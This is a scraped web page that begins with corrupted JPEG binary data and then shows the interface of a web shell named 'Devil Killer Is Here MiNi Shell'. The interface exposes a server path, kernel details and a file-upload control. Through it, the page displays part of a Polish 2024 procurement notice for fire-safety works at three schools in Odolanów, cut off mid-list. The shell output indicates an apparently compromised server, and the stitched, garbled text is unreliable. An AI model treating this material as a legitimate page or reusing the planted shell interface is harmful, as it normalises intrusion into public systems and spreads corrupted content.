JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240705/0040035001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Dostosowanie budynków Szkoły Podstawowej w Tarchałach Wielkich, Szkoły Podstawowej w Raczycach oraz Szkoły Podstawowej w Uciechowie do wymagań ekspertyzy technicznej przeciwpożarowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzą zamawiający działający wspólnie</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA I MIASTO ODOLANÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250855127</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Odolanów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-430</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@odolanow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.odolanow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.8.) Informacje o pozostałych zamawiających działających wspólnie</h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">2</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Podstawowa w Uciechowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">001228283</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Odolanowska 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Uciechów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-430</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pomoc@szkolnastrona.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://spuciechow.szkolnastrona.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">3</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Podstawowa w Raczycach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">367993577</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Odolanowska 80</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Raczyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-430</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sp.raczyce@interia.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">sp.raczyce.szkolnastrona.pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">4</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Podstawowa w Tarchałach Wielkich</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">001228314</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szkolna 69</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tarchały Wielkie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-430</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sptarchaly@o2.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.odolanow.pl</span></h3> <h3 class="mb-0">1.9.) Podział obowiązków – zamówienie wspólne</h3> <p class="mb-0">podział obowiązków, powierzenie Gminie i Miastu Odolanów przeprowadzenia postępowania w imieniu i na rzecz pozostałych zamawiających</p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostosowanie budynków Szkoły Podstawowej w Tarchałach Wielkich, Szkoły Podstawowej w Raczycach oraz Szkoły Podstawowej w Uciechowie do wymagań ekspertyzy technicznej przeciwpożarowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-51bb16ff-3978-43ae-981f-880ab9f9beea</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00400350</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-propublico.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu<br/>komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem<br/>Platformy on-line działającej pod adresem https://e-propublico.pl. Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z Platformy<br/>określone w Regulaminie zamieszczonym na stronie internetowej https://e-propublico.pl oraz uznaje go za wiążący. Wykonawca<br/>zamierzający wziąć udział w postępowaniu musi posiadać konto na Platformie. Do złożenia oferty konieczne jest posiadanie przez<br/>osobę upoważnioną do reprezentowania Wykonawcy ważnego kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub<br/>podpisu osobistego zgodnie z wymaganiami określonymi w tym zakresie przez Zamawiającego w dokumencie SWZ. Zamawiający<br/>określa następujące wymagania sprzętowo – aplikacyjne pozwalające na korzystanie z Platformy: stały dostęp do sieci Internet;<br/>posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail), komputer z zainstalowanym systemem operacyjnym Windows<br/>7 (lub nowszym) albo Linux, zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje z najnowszymi, stabilnymi<br/>wersjami wszystkich głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft Edge, Mozilla Firefox, Google Chrome,<br/>Opera); włączona obsługa JavaScript oraz Cookies. Maksymalny rozmiar pojedynczego pliku przesyłanego za pośrednictwem<br/>Platformy wynosi 80 MB, przy czym nie określa się limitu liczby plików. Zamawiający określa następujące informacje na temat<br/>kodowania i czasu odbioru danych: załączony i przesłany przez Wykonawcę za pomocą Platformy plik oferty wraz z załącznikami<br/>przechowywane są na serwerach Platformy w formie zaszyfrowanej, a Zamawiający otrzyma dostęp do plików dopiero po upływie<br/>terminu otwarcia ofert; oznaczenie czasu odbioru danych przez Platformę stanowi przyporządkowaną do dokumentu elektronicznego<br/>datę oraz dokładny czas (hh:mm:ss), widoczne przy wysłanym dokumencie w kolumnie &#34;Data przesłania&#34;; o terminie przesłania<br/>decyduje czas pełnego przeprocesowania transakcji pliku na Platformie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.) – dalej: RODO – tym samym dane osobowe podane przez Wykonawcę będą<br/>przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi. Administratorem Pani/Pana danych osobowych jest Gmina i Miasto <br/>Odolanów, Rynek 11 , 63-430 Odolanów.<br/>Tel.: 62 733-15-81, e-mail: sekretariat@odolanow.pl<br/> Dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>przedmiotowym postępowaniem o udzielenie zamówienia publicznego. Odbiorcami przekazanych przez Wykonawcę danych<br/>osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3<br/>Ustawy Pzp, a także art. 6 Ustawy z 6 września 2001 r. o dostępie do informacji publicznej. Dane osobowe Wykonawcy zawarte w<br/>protokole postępowania będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia. Jeżeli<br/>czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Zamawiający nie planuje<br/>przetwarzania danych osobowych Wykonawcy w celu innym niż cel określony powyżej. Wykonawca jest zobowiązany, w związku z<br/>udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalnoprawnych wymaganych przez RODO i<br/>związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Należą do nich obowiązki informacyjne z art. 13<br/>RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał i<br/>przekazał Zamawiającemu w treści oferty lub dokumentów składanych na żądanie Zamawiającego oraz art. 14 RODO względem<br/>osób fizycznych, których dane Wykonawca pozyskał w sposób pośredni, a które to dane Wykonawca przekazuje Zamawiającemu w<br/>treści oferty lub dokumentów składanych na żądanie Zamawiającego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, że: udostępnia dane osobowe, o których mowa w art. 10 RODO<br/>(dane osobowe dotyczące wyroków skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie; udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych<br/>osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub światopoglądowe,<br/>przynależność do związków zawodowych oraz przetwarzania danych genetycznych, danych biometrycznych w celu jednoznacznego<br/>zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w<br/>toku postępowania o udzielenie zamówienia; w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez<br/>Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem Wykonawcy do uzyskania od<br/>administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem Wykonawcy do bycia poinformowanym o<br/>odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa<br/>trzeciego lub organizacji międzynarodowej oraz prawem otrzymania przez Wykonawcę od administratora kopii danych osobowych<br/>podlegających przetwarzaniu), Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji,<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia; skorzystanie przez osobę,<br/>której dane osobowe są przetwarzane, z uprawnienia, o którym mowa w art. 16 RODO (uprawnienie do sprostowania lub<br/>uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników; w postępowaniu<br/>o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania; w przypadku, gdy wniesienie żądania dotyczącego<br/>prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole<br/>postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia Zamawiający nie<br/>udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.10.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1. Wykonanie robót budowlanych mających na celu dostosowanie budynku Szkoły Podstawowa im. Polskich Sportowców w Tarchałach Wielkich ul. Szkolna 69 do wymagań ekspertyzy technicznej przeciwpożarowej oraz Postanowienia KW PSP w Poznaniu<br/><br/>Przedmiotem zamówienia są roboty budowlane i pozostałe świadczenia opisane w dokumentacji technicznej i STWIOR, które stanowią załączniki do SWZ. <br/><br/>Celem zamówienia jest wykonanie w budynku szkoły podstawowe robót budowlanych i wykonanie pozostałych świadczeń w ramach przystosowania budynku do przepisów przeciwpożarowych, zgodnie z ekspertyzą przeciwpożarową oraz postanowieniem KW PSP w Poznaniu. <br/>W ramach zamówienia wykonawca zobowiązany jest do wykonania:<br/><br/>Zadanie nr 1.1. Wykonanie robót budowlanych dostosowania budynku do wymagań ekspertyzy technicznej przeciwpożarowej oraz Postanowienia KW PSP w Poznaniu wg projektu architektoniczno - budowlanego.<br/><br/>W ramach przystosowania budynku do przepisów przeciwpożarowych, zgodnie z ekspertyzą przeciwpożarową oraz postanowieniem KW PSP w Poznaniu, projektuje się w szczególności: <br/><br/>1. Obudowa klatki schodowej K1 na kondygnacji piwnic, parteru, piętra 1 i poddasza. <br/>Projektuje się obudowę klatki schodowej K1 poprzez montaż drzwi wewnętrznych, przeszklonych, wykonanych z profili aluminiowych, o klasie odporności ogniowej EIS 30, wyposażonych w elektrotrzymacze, przeszklonych szkłem bezpiecznym P4, zgodnie z zestawieniem ślusarki dla każdej kondygnacji. Przy montażu drzwi należy bezwzględnie stosować się do zaleceń producenta danego systemu. <br/>Na poziomie parteru planuje się likwidację przeszklonej ściany z drzwiami i projektuje się w tym miejscu ścianę przeszkloną (doświetla) o klasie REI 60 odporności ogniowej wraz z drzwiami przeszklonymi o klasie EIS 30 odporności ogniowej wyposażonymi w elektrotrzymacze. Projektowane drzwi przeszklone szkłem bezpiecznym P4. <br/>Zestawy szklane w drzwiach oraz doświetlach powinny spełniać minimum następujące wymagania: <br/>- grubości poszczególnych tafli szkła - wg obliczeń statycznych dostawcy szkła. <br/>- przykładowe szklenie dla poszczególnych kwater podano w zestawieniu. <br/>UWAGA! Ze względu na wymaganą dużą precyzję, wszystkie zamówienia należy realizować dopiero po sporządzeniu obmiaru rzeczywistych wielkości otworów na budowie. <br/>Zastosowane materiały muszą spełniać wymagania i posiadać aprobaty dotyczące odpowiedniej klasy odporności ogniowej. <br/>Lokalizacja projektowanych przegród została przedstawiona na rysunkach architektonicznych poszczególnych kondygnacji. <br/>Na poziomie parteru, istniejące między klatką schodową K1 a gabinetem dyrektora przeszklenie planuje się zdemontować i zamontować drzwi przeszklone w klasie EIS 30 odporności ogniowej, stanowiące dostęp do istniejącej gabloty. <br/><br/>2. Wymiana stolarki drzwiowej. <br/>W obrębie klatki schodowej oraz na poziomie poddasza planuje się wymianę istniejących drzwi oraz projektuje się nowe drzwi o klasie EIS 30 odporności ogniowej, wyposażone w elektrotrzymacze oraz drzwi o klasie EI 60 (drzwi do pomieszczenia nr 2.05). Wymiary drzwi zgodnie z rysunkiem architektonicznym nr 2 (Rzut piwnic), nr 3 (Rzut parteru), nr 4 (Rzut piętra) i nr 5 (Rzut poddasza). <br/><br/>Na poziomie piwnic pomiędzy kuchnią, zmywalnią i magazynem a pomieszczeniem pomocniczym planuje się likwidację drzwi przesuwnych i projektuje się nowe drzwi rozwierane, płytowe o wymiarach w świetle 80x200 cm. <br/><br/>3. Roboty tynkarskie i malarskie. <br/>Wszystkie powstałe ubytki podczas wymiany stolarki drzwiowej należy uzupełnić i przywrócić stan pierwotny elementów ścian. <br/>Po zamontowaniu nowych drzwi planuje się wykonanie obróbki ościeży wewnętrznych, poprzez przeszpachlowanie nierówności i pomalowanie farbami emulsyjnymi. <br/>Ubytki w tynkach należy naprawiać tynkiem wewnętrznym gr. min. 1 cm z gładzią gipsową. <br/>Na elementach tynkowanych wykonać szpachlówkę gipsową maszynową. Wszystkie zewnętrzne narożniki muszą mieć wbudowane profile ochronne. <br/>Ściany projektowanej zabudowy klatki schodowej planuje się wykończyć gładzią gipsową i malować farbą emulsyjną w kolorze dostosowanym do kolorystki istniejących ścian. Istniejące ściany komunikacji od strony klatki schodowej planuje się w całości malować farbą emulsyjną celem ujednolicenia kolorystki. <br/><br/>4. Obudowa drewnianych słupów i podciągów. <br/>Zlokalizowane na poddaszu słupy i podciągi drewniane planuje się obudować do klasy EI 60 odporności ogniowej. Obudowa słupów i podciągów drewnianych standardowymi płytami GKB 12,5 mm. <br/><br/>Zadanie nr 1.2. Wykonanie oddymiania klatki schodowej K1 zgodnie z przedstawionym projektem.<br/>Klatkę schodową K1 planuje się wyposażyć w mechaniczny system usuwania dymu i ciepła, uruchamiany samoczynnie za pomocą systemu wykrywania dymu. Przewiduje się grawitacyjny normatywny system oddymiania. Napowietrzanie realizowane drzwiami DZ1. Oddymianie za pomocą klapy dymowej. <br/><br/>- wyznaczenie tras kablowych,<br/>- przekucie ścian pod instalację, <br/>- montaż koryt kablowych, <br/>- rozprowadzenie przewodów/kabli zasilających, <br/>- wykonanie wszelkich połączeń elektrycznych zgodnie z projektem technicznym, <br/>- rozbudowa rozdzielnic zasilających, <br/>- montaż przycisków oddymiania, <br/>-montaż czujek dymu, <br/>- montaż elektrotrzymaczy magnetycznych, <br/>- montaż centrali oddymiania, <br/>- montaż klapy dymowej wraz z siłownikiem, <br/>- montaż siłowników na drzwiach napowietrzających, <br/>- sprawdzenie rezystancji przewodów, <br/>- sprawdzenie skuteczności działania instalacji, <br/>- roboty malarskie w miejscach montażu instalacji i urządzeń. <br/><br/>Szczegółowy zakres prac określony jest w projekcie technicznym systemu oddymiania grawitacyjnego klatki schodowej. <br/><br/>Zadanie nr 1.3. Wykonanie awaryjnego oświetlenia ewakuacyjnego zgodnie z przedstawionym projektem.<br/><br/>Instalacja awaryjnego oświetlenia ewakuacyjnego na wszystkich drogach ewakuacyjnych o zwiększonym natężeniu do wartości 5 lx na podłodze wzdłuż środkowej linii drogi ewakuacyjnej. Ponadto instalacja powinna zapewniać oświetlenie przez minimum 1 godz. Oprawy awaryjnego oświetlenia ewakuacyjnego znajdują się również przed wejściem do budynku (od zewnętrznej strony). <br/><br/>Roboty instalacyjne elektryczne, ten zakres robót budowlanych obejmują:<br/>1) wyznaczenie tras kablowych,<br/>2) przekucie ścian i stropów pod instalację,<br/>3) montaż kabli linii dozorowych w listwach elektroinstalacyjnych,<br/>4) montaż kabli sterujących,<br/>5) montaż kabli monitorujących,<br/>6) montaż elementów sterujących, kontrolnych, kontrolno-sterujących,<br/>7) montaż puszek instalacyjnych,<br/>8) rozprowadzenie przewodów/kabli zasilających,<br/>9) montaż kabli zasilających zasilacze pożarowe,<br/>10) wykonanie wszelkich połączeń elektrycznych wg projektu technicznego,<br/>11) podłączenie przewodów elektrycznych do urządzeń,<br/>12) sprawdzenie rezystancji przewodów,<br/>13) sprawdzenie skuteczności działania 